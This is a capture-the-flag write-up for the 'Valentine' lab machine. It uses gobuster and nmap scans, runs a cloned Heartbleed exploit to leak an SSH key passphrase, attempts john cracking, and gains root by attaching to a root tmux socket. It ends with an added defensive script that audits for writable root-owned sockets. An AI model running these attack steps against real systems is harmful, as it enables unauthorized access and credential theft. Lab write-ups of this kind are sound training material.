Valentine
Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux
Scanning

HTTP Enumeration

Viewing the page source didn't give me anything, and neither did the robots.txt file.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

Viewing /dev gives two important files. The encode and decode endpoints are just scripts run by the backend - I tried command injection there, but nothing worked :(

The hype_key file is a hex-encoded string.

Let’s use an online tool to convert it to text - We find out that it is an RSA private key!

After changing the permissions, I tried logging in via ssh:
chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
hype_key's passphrase:
So now we need to figure out the passphrase; for this we can use the ssh2john utility!
ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .
Nothing useful, john couldn't crack it - BACK TO ENUMERATION :(
nmap --script vuln -oA vuln-scan 10.10.10.79

Heartbleed is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of systems protected by a vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, and other sensitive information. It also allows attackers to eavesdrop on communications.
In order to exploit this we can use this script:
git clone https://gist.github.com/10174134.git

Let’s run the exploit with a loop count of 10:
python heartbleed.py -p 443 -n 10 10.10.10.79

We get a base64-encoded string; when we decode it, we have the passphrase!
echo "aGVhcn.........." | base64 -d
heartbleedbeleievethehype
We can now log on to the box using ssh:
ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported
I encountered this error and spent some time fixing it - the fix is:
ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation
I checked the .bash_history because it wasn't linked to /dev/null:
ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit
The file dev_sess was a socket file and it had the SUID bit set - when we attached to that tmux session through the socket, we became root!
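The escalation above works because a low-privilege user can connect to a socket that belongs to a root tmux session. As an added example (not part of the original writeup, and not the box's own code), here is a small defender-side audit that walks the filesystem and flags root-owned Unix sockets that a non-root user or group could connect to; the function names and the pruned paths are my own choices.

```python
"""Audit for Unix-domain sockets (tmux/screen session sockets and similar)
that a low-privilege user could attach to. Added example; not from the
writeup. Function names and the PRUNE set below are my own assumptions."""
import os
import stat
from typing import List, Optional, Tuple

PRUNE = {"/proc", "/sys", "/dev", "/run"}  # pseudo/volatile filesystems to skip


def socket_risk(uid: int, gid: int, mode: int) -> Optional[str]:
    """Return why a socket is risky, or None if it is not.

    `mode` is st_mode with the file-type bits included (as from os.lstat).
    connect() on a Unix socket needs write permission on the socket file,
    so a root-owned socket writable by a non-root group or by everyone lets
    that principal attach to whatever root process listens on it.
    """
    if not stat.S_ISSOCK(mode) or uid != 0:
        return None
    perm = stat.S_IMODE(mode)
    if perm & stat.S_IWOTH:
        return "root-owned socket is world-writable"
    if perm & stat.S_IWGRP and gid != 0:
        return f"root-owned socket is writable by non-root group gid={gid}"
    return None


def audit_sockets(start: str = "/") -> List[Tuple[str, str]]:
    """Walk the filesystem from `start` and list risky sockets with reasons."""
    findings: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(start):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in filenames:  # os.walk reports sockets among filenames
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            reason = socket_risk(st.st_uid, st.st_gid, st.st_mode)
            if reason:
                findings.append((path, reason))
    return findings


if __name__ == "__main__":
    for path, reason in audit_sockets("/"):
        print(f"{path}: {reason}")
```

A socket listed as `srw-rw---- root hype`, like the one in this writeup, is reported because root owns it while the hype group can write to (and therefore connect to) it.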